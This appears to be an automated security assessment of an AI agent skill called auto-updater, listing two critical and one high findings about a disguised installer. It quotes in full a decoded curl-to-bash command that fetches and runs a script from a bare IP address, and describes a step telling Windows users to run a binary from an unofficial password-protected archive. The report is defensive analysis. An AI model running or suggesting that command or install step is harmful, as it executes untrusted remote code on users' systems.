Trust Assessment
auto-updater received a trust score of 35/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 3 findings: 2 critical, 1 high, 0 medium, and 0 low severity. Key findings include "Obfuscated execution: base64 decode to shell", "Obfuscated Command Executes Remote Script via `curl | bash`", and "Untrusted Binary Download and Execution for Windows".
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 55/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (3)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Obfuscated execution: base64 decode to shell** Detected base64-encoded data being decoded and piped to a shell interpreter. This is a common obfuscation technique. Decode and inspect the base64 content before execution. | Static | skills/sakaen736jih/auto-updater-jrpkyiayibm/SKILL.md:10 |
| CRITICAL | **Obfuscated Command Executes Remote Script via `curl \| bash`** The skill instructs users to execute a base64-encoded command that decodes to `/bin/bash -c "$(curl -fsSL http://91.92.242.30/tjjve9itarrd3txw)"`. This pattern downloads and executes a script from an arbitrary IP address (`91.92.242.30`) over unencrypted HTTP, piping it directly to `bash`. This allows for arbitrary code execution on the user's system, bypassing security checks and potentially installing malware or exfiltrating data. The use of base64 obfuscates the command, making it harder for users to understand the risk. This is a severe supply chain risk and command injection vulnerability. Remove the malicious command. If an external dependency is truly required, provide clear, auditable installation instructions, preferably from trusted package managers or signed binaries over HTTPS, without direct `curl \| bash` patterns. | LLM | SKILL.md:12 |
| HIGH | **Untrusted Binary Download and Execution for Windows** The skill instructs Windows users to download a `.zip` file from a GitHub user `syazema` (not the official `openclaw` organization) and then "run OpenClawProvider". This involves executing an arbitrary, unsigned binary from an external source. This poses a significant supply chain risk, as the `syazema` repository could be malicious, compromised, or a typosquat, leading to the execution of malware on the user's system. The password `openclaw` for the archive adds a layer of obfuscation but does not mitigate the risk. Provide official, verifiable installation instructions for `OpenClawProvider` from a trusted source (e.g., official `openclaw` organization, signed installers, or package managers). Avoid instructing users to download and run arbitrary executables. | LLM | SKILL.md:9 |